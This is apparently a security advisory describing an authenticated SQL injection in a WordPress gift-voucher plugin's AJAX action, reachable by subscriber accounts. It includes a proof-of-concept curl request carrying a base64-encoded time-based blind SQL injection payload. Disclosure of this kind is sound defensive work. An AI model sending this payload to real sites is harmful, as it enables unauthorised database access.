The plugin does not properly sanitise and escape the template parameter before using it in a SQL statement via the wpgv_doajax_voucher_pdf_save_func AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --data "action=wpgv_doajax_voucher_pdf_save_func&nonce=af77cd5581&template=KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&buying_for=&for=&from=&value=&message=&code=&shipping=&shipping_email=&firstname=&lastname=&email=&address=&pincode=&shipping_method=&paymentmethod="